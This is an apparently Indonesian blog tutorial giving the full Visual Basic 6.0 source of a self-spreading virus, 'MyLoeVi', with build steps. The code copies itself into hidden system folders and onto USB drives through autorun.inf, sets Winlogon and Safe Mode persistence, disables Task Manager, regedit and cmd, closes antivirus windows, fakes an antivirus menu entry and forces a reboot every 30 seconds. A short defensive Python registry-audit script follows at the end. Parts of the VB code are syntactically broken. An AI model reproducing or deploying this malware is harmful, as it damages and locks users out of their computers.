Tuesday, 31 January 2012

Saturday, 13 November 2010

Creating the MyLoeVi Virus with VB 6.0

Here I will try to build a virus using Visual Basic 6.0. This virus is fairly dangerous, so be careful
that it does not hit your own computer. While it is running, the virus restarts your computer
every 30 seconds.
Let's get straight to it. Create a Form consisting of 1 CommandButton, 1 Label and 2 Timers, with the
ControlBox property set to False.
Copy the following code:

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As
String, ByVal lpWindowName As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As_ Long,
ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function GetDriveType& Lib "Kernel32" Alias "GetDriveTypeA" (ByVal nDrive_ As
String)
Private Declare Function ExitWindowsEx Lib "user32" (ByVal dwOptions As Long, ByVal_ dwReserved
As Long) As Long 'exit windows
Private Const WM_CLOSE = &H10
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4
Private Const EWX_POWEROFF = 8
Option Explicit
Dim FWnd
Dim obj As Object
Dim doc As Object
Dim WrkBook As Object
Dim WrkSheet As Object
Dim i As Integer
Dim RegRun
Dim FolderStartUp
Dim FolderMyDocuments
Dim FolderTemplates
Dim FolderNetHood
Dim FolderPrintHood
Dim FolderFavorites
Dim FolderSendTo
Dim FolderWindows
Dim FolderPrograms
Dim FlashDisk
Dim TotalTenthDetik, TotalDetik, TenthDetik, Detik, a As Integer
Private Sub Command1_Click()
'Anti-MyLoeVi, in case the program is accidentally run on your own computer.
Dim pass
pass = InputBox("Masukan Password Anti-MyLoeVi", "Password")
If pass = "close" Then ‘mengecek kode anti virus dengan password “close”
Timer1.Enabled = False
Timer2.Enabled = False
AntiRegestry
End
Else
Msgbox”Password salah…! Waktu kw tinggal “ & a & “ Detik lagi”,vbinformation,”informasi”
CopyRight@2010=====SICU/JEMO SERAWAI 2010
End If
End Sub
Private Sub Form_Load()
On Error Resume Next
'randomize the virus caption so that it changes every time Windows starts or the virus is executed
Randomize
Me.Caption = Int(Rnd * 2221189331445#)
'replicate itself
Gandakefolder
InfeksiRegistry
MsgBox "Hy adek sanak, aQ datang untuk kalian segalonyo, terimo kasih y lah ndx bekawan", ,
"hy……"
End Sub
Private Sub InfeksiRegistry()
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", 1,
"REG_DWORD" 'menghapus semua icon di dekstop
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderMyDocuments &
"\MyLoeVi.exe""" 'virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & "c:\MyLoeVi.exe"""
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & "D:\System.exe"""
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderWindows & "\MyLoeVi.exe"""
'the virus keeps running in Safe Mode
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", FolderFavorites
& "\cssz.exe" 'virus akan tetap berjalan pada Safe Mode With Command Prompt
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 1, "REG_DWORD" 'Folder Options tak terlihat
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 1, "REG_DWORD" 'Folder Options tak terlihat
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSu
perHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSupe
rHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRe
gistryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegi
stryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderTemplates & "\gWgTLoe.exe" 'gWgTLoe.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderSendTo & "\System.exe" 'System.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
1, "REG_DWORD" 'search pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
1, "REG_DWORD" 'Ssearch pd star menu hilang
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose"
, 1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose",
1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\",
FolderFavorites & "\cssz.exe" 'Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi
bukan Antivirus yang dijalankan melainkan Virus cssz.exe yang terletak di Folder Favorite
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives
", 4, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives",
4, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileM
enu", 1, "REG_DWORD" 'Menu File pada Windows Ekplorer hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun",
1, "REG_DWORD" 'Autorun pada CD atau USB
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\Start_Sho
wControlPanel", 0, "REG_DWORD"
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertie
sMyComputer", 1, "REG_DWORD"
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoProperti
esMyComputer", 1, "REG_DWORD"
End Sub
Sub GandaKeFD()
'Replicate itself to the flash disk
On Error Resume Next
If Dir(FlashDisk & "\MyLoeVi.exe") <> "MyLoeVi.exe" Then 'mengecek ada atau tdknya
MyLoeVi.exe di flashdisk jika tdk ada kemudian
FileCopy FolderStartUp & "\MyLoeVi.exe", FlashDisk & "\MyLoeVi.exe"
SetAttr FlashDisk & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
End If
If Dir(FlashDisk & "\System.exe") <> "System.exe" Then 'mengecek ada atau tdknya System.exe di
flashdisk jika tdk ada kemudian
FileCopy FolderSendTo & "\System.exe", FlashDisk & "\System.exe"

SetAttr FlashDisk & "\System.exe", vbHidden + vbSystem + vbReadOnly
End If
BuatAutorunInf
End Sub
Sub BuatAutorunInf()
Open FlashDisk & "\Autorun.Inf" For Output As 1
Print #1, "[AutoRun]"
Print #1, "ACtIon=Open folder to view files"
Print #1, "Icon=MyLoeVi.exe"
Print #1, "Open=MyLoeVi.exe"
Print #1, "Open=System.exe"
Print #1, "ShellExecute=MyLoeVi.exe"
Print #1, "ShellExecute=System.exe"
Print #1, "Shell\Open\Command=MyLoeVi.exe"
Print #1, "sheLl\oPen\DefAulT=1"
Print #1, "shELl\opeN\cOmManD= MyLoeVi.exe"
Print #1, "Shell=Open"
Print #1, "shell\ExplorE\COMmANd=MyLoeVi.exe"
Print #1, "uSEAuToPLaY = 1"
Print #1, "SHell\autopLAy\commAND=MyLoeVi.exe"
Print #1, "SHell\autopLAy\commAND=System.exe"
Close #1
SetAttr FlashDisk & "\Autorun.Inf", vbHidden + vbSystem + vbReadOnly
End Sub
Sub Gandakefolder()
Set RegRun = CreateObject("WScript.Shell")
FolderStartUp = RegRun.specialfolders("StartUp")
FolderMyDocuments = RegRun.specialfolders("MyDocuments")
FolderTemplates = RegRun.specialfolders("Templates")
FolderNetHood = RegRun.specialfolders("NetHood")
FolderPrintHood = RegRun.specialfolders("PrintHood")
FolderFavorites = RegRun.specialfolders("Favorites")
FolderSendTo = RegRun.specialfolders("SendTo")
FolderPrograms = RegRun.specialfolders("Programs")
FolderWindows = RegRun.specialfolder("Windows")
'create a copy of the virus named hay.exe
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderStartUp & "\MyLoeVi.exe"
SetAttr FolderStartUp & "\hay.exe", vbHidden + vbSystem + vbReadOnly
'create a copy of the virus named MyLoeVi.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderMyDocuments & "\MyLoeVi.exe"
SetAttr FolderMyDocuments & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
'create a copy of the virus named gWgTLoe.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderTemplates & "\gWgTLoe.exe"
SetAttr FolderTemplates & "\gWgTLoe.Exe", vbHidden + vbSystem + vbReadOnly
'create a copy of the virus named smzs.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderPrintHood & "\smzs.Exe"
SetAttr FolderPrintHood & "\smzs.exe", vbHidden + vbSystem + vbReadOnly
'create a copy of the virus named MyLoeVi.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderNetHood & "\MyLoeVi.Exe"
SetAttr FolderNetHood & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
'create a copy of the virus named cssz.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderFavorites & "\cssz.Exe"
SetAttr FolderFavorites & "\cssz.exe", vbHidden + vbSystem + vbReadOnly
'create a copy of the virus named System.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderSendTo & "\System.Exe"
SetAttr FolderSendTo & "\System.exe", vbHidden + vbSystem + vbReadOnly
'create a copy of the virus named MyLoeVi.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderWindows & "\MyLoeVi.Exe"
SetAttr FolderWindows & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\MyLoeVi.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "D:\System.exe"
Gandakefolder
End Sub
Private Sub Timer1_Timer()
On Error Resume Next
'close applications that are dangerous to the virus
FWnd = FindWindow("#32770", "RUN") 'jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "System Configuration Utility") 'msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "Windows Task Manager") 'task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "Avira AntiVir Personal - Free Antivirus") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "AntiVir Guard: Attention, Detection!") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("RegEdit_RegEdit", vbNullString) 'regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&
InfeksiRegistry
End Sub
Private Sub Timer2_Timer()
On Error Resume Next
TotalTenthDetik = TotalTenthDetik + 1
TenthDetik = TotalTenthDetik Mod 60
TotalDetik = Int(TotalTenthDetik / 60)
Detik = TotalDetik Mod 60
a = 30 - Detik
Label1.Caption = "Time: " & a
Shell "C:\MyLoeVi.exe"
Shell "D:\System.exe"
If Len(Detik) = 1 Then
Detik = Detik
End If
If Detik / 2 = 1 Then
Timer1.Enabled = True
Gandakefolder
GandaKeFD
BuatAutorunInf
End If
If a = 0 Then
Timer2.Enabled = False
Shell "shutdown -r -t 3", vbHide
Me.Visible = False
MsgBox "Matilah Komputer kw ko dalam 3 detik!" & vbCrLf & "selamat jalan kekasih Q...",
vbOKOnly, "Good Bye..."
Shell "shutdown -r -t 3", vbHide
Timer2.Enabled = False
End If
Gandakefolder
InfeksiRegistry
App.TaskVisible = False
End Sub
Private Sub AntiRegestry()
'registry cleanup in case the virus is run accidentally, so that the virus can be neutralized
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", 0,
"REG_DWORD" 'menghapus semua icon di dekstop
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ 'virus akan tetap berjalan pada tipe
windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & """"
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & """"
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ 'virus akan tetap berjalan pada tipe
windows Safe Mode
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", FolderFavorites
& "" 'virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 0, "REG_DWORD" 'Folder Options tdk dapat diakses
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 0, "REG_DWORD" 'Folder Options tdk dapat diakses
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSu
perHidden", 1, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSupe
rHidden", 1, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 0,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 0,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRe
gistryTools", 0, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegi
stryTools", 0, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderTemplates & "" 'gWgTLoe.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderSendTo & "" 'System.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
0, "REG_DWORD" 'search pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
0, "REG_DWORD" 'Ssearch pd star menu hilang
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose"
, 0, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose",
0, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\",
FolderFavorites & "" 'Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan
Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak di Folder Favorite
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives
", 0, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives",
0, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileM
enu", 0, "REG_DWORD" 'Menu File pada Windows Ekplorer hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun",
0, "REG_DWORD" 'Autorun pada CD atau USB
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\Start_Sho
wControlPanel", 1, "REG_DWORD"
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertie
sMyComputer", 0, "REG_DWORD"
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoProperti
esMyComputer", 0, "REG_DWORD"
End Sub
Build the EXE file as follows:
Click File, then Make Project.Exe.
MyLoeVi is ready to run.
If you run MyLoeVi by accident, you can stop it by clicking the End button on the virus form
and then entering the password; the password here is
"close".
After that, delete the virus files.
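
A check for the registry settings this code writes, as an added example that is not part of the original post: it parses a regedit export and reports the policy values named in the listing when they are non-zero, plus a Winlogon Shell or SafeBoot AlternateShell that differs from the Windows defaults (explorer.exe, cmd.exe). The function names and the sample export are constructed for illustration.

```python
import re

# Policy DWORDs that the page's InfeksiRegistry routine sets to a non-zero value.
POLICY_NAMES = {"disableregistrytools", "disablecmd", "nofolderoptions",
                "nofind", "noclose", "nodrives", "nopropertiesmycomputer"}
# (key leaf, value name) pairs whose Windows default is one known string.
EXPECTED = {("winlogon", "shell"): "explorer.exe",
            ("safeboot", "alternateshell"): "cmd.exe"}

def parse_reg(text):
    """Yield (key, name, value) from regedit export text; value is int or str."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if not (key and m):
            continue
        name, raw = m.group(1), m.group(2)
        if raw.startswith("dword:"):
            yield key, name, int(raw[6:], 16)
        elif len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
            # .reg strings escape backslashes and quotes with a backslash
            yield key, name, re.sub(r"\\(.)", r"\1", raw[1:-1])

def audit(text):
    """Return the (key, name, value) entries that deviate from a clean system."""
    findings = []
    for key, name, value in parse_reg(text):
        leaf = key.rsplit("\\", 1)[-1].lower()
        if name.lower() in POLICY_NAMES and isinstance(value, int) and value != 0:
            findings.append((key, name, value))
        expected = EXPECTED.get((leaf, name.lower()))
        if expected and str(value).strip().lower() != expected:
            findings.append((key, name, value))
    return findings

# Constructed sample: Shell as the page's AntiRegestry routine leaves it
# (Explorer.exe followed by a stray quote), plus one policy value still set.
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe \""
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot]
"AlternateShell"="cmd.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
'''
```

Running audit() on an export taken after the password cleanup shows which values still need to be restored by hand.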